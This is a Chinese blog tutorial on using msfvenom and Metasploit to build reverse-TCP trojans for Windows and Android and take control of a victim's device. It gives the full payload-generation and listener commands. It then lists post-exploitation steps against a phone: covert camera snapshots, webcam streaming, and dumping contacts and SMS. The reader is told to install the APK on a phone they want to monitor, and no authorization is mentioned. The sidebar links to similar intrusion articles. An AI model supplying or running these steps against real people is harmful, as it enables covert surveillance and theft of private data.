metasploit、msfvenom生成木马入侵电脑及手机

最新推荐文章于 2024-06-04 18:38:16 发布
最新推荐文章于 2024-06-04 18:38:16 发布
阅读量3k 收藏 37
点赞数 5
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42892543/article/details/108962556
版权

简介

msfvenom

msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件

在这里插入图片描述

查看所有–payload的模块

msfvenom -l payloads
在这里插入图片描述

文件后缀名-f的格式

msfvenom --help-formats
在这里插入图片描述

metasploit

Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。

生成的木马是前端的话,那么这个就是后端

msfvenom的shell在windows中的使用

msfvenom生成shell.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=222.222.221.140
lport=1211 -f exe > /root/shell.exe

启动metasploit

输入命令:

msfconsole

metasploit侦听

msf > use exploit/multi/handler #加载模块 msf exploit(multi/handler) >
set payload windows/meterpreter/reverse_tcp #设置payload payload =>
windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost
kali的ip #设置kali的ip lhost => 192.168.152.131 msf
exploit(multi/handler) > set lport 1211 #设置kali的端口 lport => 1211 msf
exploit(multi/handler) > exploit #执行 [*] Started reverse TCP handler
on 222.222.221.140:1211

将生成的shell上传至windows主机中并运行

提示有返回即可控制对方电脑,如同操作linux服务器一样在这里插入图片描述

使用

? - 帮助菜单

download -下载文件/文件夹

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

msfvenom的apk在android中的使用

msfvenom生成shell.apk

ifconfig查看kali的ip,ip为222.222.221.140
在这里插入图片描述

输入命令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555
R > /root/apk.apk

这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功 只有9K多大小
在这里插入图片描述

启动metasploit
输入命令:

msfconsole

启动msfconsole
在这里插入图片描述

metasploit配置及监听

在控制台中输入

use exploit/multi/handler //加载模块

set payload android/meterpreter/reverse_tcp //选择Payload

show options //查看参数设置

在这里插入图片描述

这里需要设置LHOST的ip地址,也就是你的kali的ip地址

还有LPORT端口,刚才设置的为5555,也需要更改一下(刚才直接设置为4444也是可以的)

set LHOST 192.168.1.114 //这里的地址设置成我们刚才生成木马的IP地址(kali的ip)

set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口

exploit //开始执行漏洞 开始监听,等待手机上线

接下来就要把生成的apk装在你想监控的手机上了,等待手机上线了

在这里插入图片描述
使用
然后可以输入sysinfo 查看手机信息
在这里插入图片描述
webcam_list 查看手机有多少个摄像头 这里显示是2个

在这里插入图片描述

webcam_stream //开启摄像头

在这里插入图片描述

webcam_snap //隐秘拍照功能

在这里插入图片描述
在这里插入图片描述

dump_contacts //导出电话号码

在这里插入图片描述
在这里插入图片描述

dump_sms //导出信息

在这里插入图片描述
导出的文件拍的照片都会在root下面
在这里插入图片描述

可以输入?查看更多命令

在这里插入图片描述

session切换 background #后台运行当前
session sessions #列出所有session
sessions -i Id #选择某一个sessionID进入
session sessions -n Name -i Id #给session重命名

参考:https://blog.csdn.net/langtuteng17/article/details/80444115

爱你'非我莫属。
关注
  • 5
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 11
    评论
专栏目录
msfvenom制作windows/linux/android/ios木马
Cwillchris的博客
05-04 1846
msfvenom选项如下 -p, --payload<payload> 指定 payload(攻击荷载)。如果使用自定义payload,请使用'-'或者stdin指定。 -l, --list [module_typel列出指定模块的所有可用资源。模块类型包括:payloads, encoders, nops, all -n, --nopsled <length>为payload预先指定一个NOP滑动长度。 -f, --format <format>指定输出格式(使
第六章:iOS恶意软件和后门 ——6.5 针对iOS使用Metasploit
vmdig.com
08-25 2122
。。。
iOS与Android设备到底是如何被入侵的?
weixin_33829657的博客
08-02 132
刚刚由维基解密曝光的Vault 7机密信息库再次为我们敲响了警钟:人们根本不知道Android或者iPhone手机为何遭遇入侵,亦不清楚其会带来哪些风险。 新闻警告称,CIA能够利用黑客工具入侵任何人的移动设备,而维基解密表示部分工具甚至能够绕过Signal、Telegram、WhatsApp及Confide等安全消息传递应用以拦截加密消息。 不过首...
Kali初讲——非局域网下入侵手机
最新发布
萌蠢骇客
06-04 1494
kali linux使用反弹shell入侵手机全流程——使用本教程请遵循网络安全法。
msf手机渗透二(实现外网渗透)
weixin_63204687的博客
11-07 3128
在内网穿透官网注册飞鸽内网穿透开通隧道,然后本地端口与公网端口绑定,这样访问公网的所有请求最后都会传入本地端口。在本地生成apk的时候使用公网IP和对应Port而对其进行监听的时候设置本地IP和port。这样app在别人手机上被点击以后会直接链接公网对应IP端口,因为公网的已经和本地的绑定了,并且在电脑监听的时候监听的是本地端口,所以最后链接返回给本地电脑。使用公网开通隧道本质上是一个桥梁作用,连接了不同局域网之间的通信。
MSF手机渗透实验
weixin_63204687的博客
10-22 4274
可真刑,太可拷了
漏洞复现
axuhongbo的博客
11-20 1411
本文为的安卓漏洞 CVE-2019-6447 复现 用到的apk下载链接: APK下载链接 kali 虚拟机 curl --header "Content-Type: application/json" --request POST --data "{\"command\":getDeviceInfo}" http://192.168.43.251:59777 -vvv 参考链接 POC 参考链接1 参考链接2 ...
实战 | 记一次对iphone手机游戏的渗透测试
leah126的博客
02-10 1563
各位师傅好,我是女鬼水妖,某高校大二学生,热爱网络安全,主攻红队方向。账号密码就是为了获取 _session,同时 _session 是固定不变的 所以就可以说这个 _session 可以绕过来进行。再加上我本来是比较喜欢打游戏的,经过某公司渗透授权,对此游戏进行渗透测试。1. 移动端游戏是比较少进行渗透,我相信漏洞也是很多的,师傅们可以自己去挖掘。我们的目的不是登录其他用户的账号,我们是看是否能直接进行对数据库进行读取。先进行登录,发现它居然是用明文传输,没有经过其他加密算法进行加密。
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
`msfvenom`是Metasploit框架的一部分,是一个强大的工具,可以生成各种类型的恶意软件payload,用于渗透测试。以下是对`msfvenom`的详细解释以及如何使用它生成木马进行渗透测试。 首先,`msfvenom`允许测试者创建...
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
0x09.第九课 Metasploit生成linux木马并尝试提权.pdf
06-24
0x09.第九课 Metasploit生成linux木马并尝试提权.pdf
Metasploit 实现木马生成、捆绑及免杀-内含源码以及设计说明书(可以自己运行复现).zip
05-08
**Metasploit 实现木马生成、捆绑及免杀** Metasploit 是一个开源的安全漏洞测试框架,广泛用于渗透测试和安全研究。本教程将深入探讨如何利用 Metasploit 来创建、捆绑木马以及实现免杀技术。通过源码分析和设计...
windows|kali安装charles
szgyunyun的博客
03-02 853
【代码】kali安装charles。
msf渗透手机(操作手机系统)
xss2001999的博客
11-09 469
msf渗透智能手机(安卓系统)
苹果系统新致命漏洞,黑客可以随意控制您的手机设备
w3cschools的博客
04-21 9756
国内知名黑客组织东方联盟的安全研究人员发现了苹果一个新的漏洞,可能会让黑客在您不知情的情况下访问您的iPhone和iPad。一旦用户授权他们的设备与黑客连接到同一个Wi-Fi网络,他们称这种漏洞为“信任劫持”,从而允许您无线管理iOS设备。东方联盟创始人兼黑客教父郭盛华:“一旦建立起这种信任关系,一切皆有可能,它引入了一种新的攻击媒介。”第一步需要您在安装完成后通过USB电缆将设备连接到计算机,但...
渗透测试18---Metasploit 实战
初遇我ㄖ寸の热情呢?
04-14 7724
Metasploit简称msfmsf5>banner 看一些花里胡哨的东西) 1.nmap与msf配合的完整案例 nmap与msf配合的流程 0.漏洞发布:无论是操作系统层次还是应用层次的,都会发布漏洞(比如:MS08-067)。我们要关注信息。(微软的漏洞都会以MS开头,其他漏洞可能是CVE-之类的,search的时候可以查找到) 有时候会发布在公共的平台里面 1.确定需求...
kali中间人攻击----盗取账号和密码
热门推荐
baidu_38803985的博客
04-10 1万+
声明: 本案例仅供个实验使用, 并不作任何违法违纪等不正当,请遵守约定。 1.原理解析 在局域网内通信都是通过交换机及路由器连接外部网络的, 对于局域网内大家都使用的一个协议 为ARP协议, 这个协议很奇特因为它是用来标定局域网内每台主机的MAC地址使用的, 还有就是ARP协 议也是用来规定网关的。   在我们下面要做的实验的过程中, kali系统会时刻向选定的机器发送“我是网关”, 这样堵塞了真...
Metasploit和Cobalt Strike生成木马的过程
03-25
1. Metasploit生成木马的过程 Metasploit是一个常用的网络安全工具,它可以帮助渗透测试人员和安全研究人员生成各种漏洞利用和后门程序。以下是使用Metasploit生成木马的一般过程: 步骤1:启动Metasploit控制台并选择木马生成模块 Metasploit控制台提供了各种服务和模块,可以生成不同类型的木马程序。要使用Metasploit生成木马,需要首先启动控制台,然后选择木马生成模块。可以使用“msfconsole”命令启动控制台,然后使用“search”命令搜索木马生成模块。 步骤2:配置木马生成参数 选择木马生成模块后,需要配置一些参数才能生成相应的木马程序。这些参数可能包括攻击目标信息、连接方式、监听端口、处理连接的话柄等等。根据需要,可以逐一配置这些参数,然后生成木马。 步骤3:生成木马并保存 完成配置参数后,可以使用“generate”命令生成木马程序。然后,可以使用“save”命令将生成木马保存到本地目录中。 2. Cobalt Strike生成木马的过程 Cobalt Strike是一款高级的渗透测试工具,可以帮助渗透测试人员生成各种后门程序、木马程序等。以下是使用Cobalt Strike生成木马的一般过程: 步骤1:启动Cobalt Strike客户端并选择木马生成器 启动Cobalt Strike客户端后,可以看到各种功能按钮和命令。要使用Cobalt Strike生成木马,需要选择“payload generator”按钮打开木马生成器。 步骤2:配置木马生成参数 在木马生成器界面,需要配置一些参数才能生成相应的木马程序。这些参数可能包括攻击目标信息、连接方式、监听端口、加密方式等等。根据需要,可以逐一配置这些参数,然后生成木马。 步骤3:生成木马并保存 完成参数配置后,可以使用“generate”命令生成木马程序。然后,可以使用“save”命令将生成木马保存到本地目录中。同时,也可以选择将木马发送到受攻击者的计算机上。 总之,Metasploit和Cobalt Strike都是非常强大的网络安全工具,可以帮助渗透测试人员和安全研究人员生成各种漏洞利用和后门程序,提高安全测试和研究效率。在使用这些工具时,需要谨慎操作,避免对他人或自己造成不必要的损失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值